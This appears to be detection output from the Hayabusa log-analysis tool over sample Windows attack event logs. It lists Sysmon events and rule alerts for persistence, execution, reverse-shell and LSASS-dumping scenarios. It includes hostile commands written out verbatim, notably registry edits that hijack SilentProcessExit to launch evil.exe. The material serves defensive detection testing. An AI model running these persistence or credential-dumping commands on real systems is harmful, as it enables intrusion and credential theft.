ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: 
C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 
07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 
+09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 
+2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 
+09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process 
Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 